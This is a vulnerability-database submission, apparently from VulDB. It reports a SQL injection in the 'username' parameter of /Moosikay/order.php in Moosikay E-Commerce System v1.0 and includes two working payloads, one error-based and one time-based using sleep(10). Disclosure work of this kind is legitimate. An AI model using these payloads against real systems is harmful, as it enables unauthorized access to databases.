| 标题 | Moosikay - E-Commerce System v1.0 /Moosikay/order.php post parameter 'username' exists SQL injection vulnerability |
|---|
| 描述 | An issue was discovered in Moosikay - E-Commerce System v1.0.
There is a SQL injection that can directly issue instructions to the background database system via /Moosikay/order.php post parameter username.
Error injection payload: username=a'&password=b&login=
Delayed injection payload:username=a' and (select 1 FROM (select(sleep(10)))a)-- b&password=b&login= |
|---|
| 来源 | ⚠️ https://github.com/jidle123/bug_report/blob/main/vendors/razormist/Moosikay%20-%20E-Commerce%20System/SQLi-1.md |
|---|
| 用户 | jidle (UID 41297) |
|---|
| 提交 | 2023-02-23 10時10分 (3 年前) |
|---|
| 管理 | 2023-02-24 08時29分 (22 hours later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 221732 [SourceCodester Moosikay E-Commerce System 1.0 POST Parameter /Moosikay/order.php 用户名 SQL注入] |
|---|
| 积分 | 18 |
|---|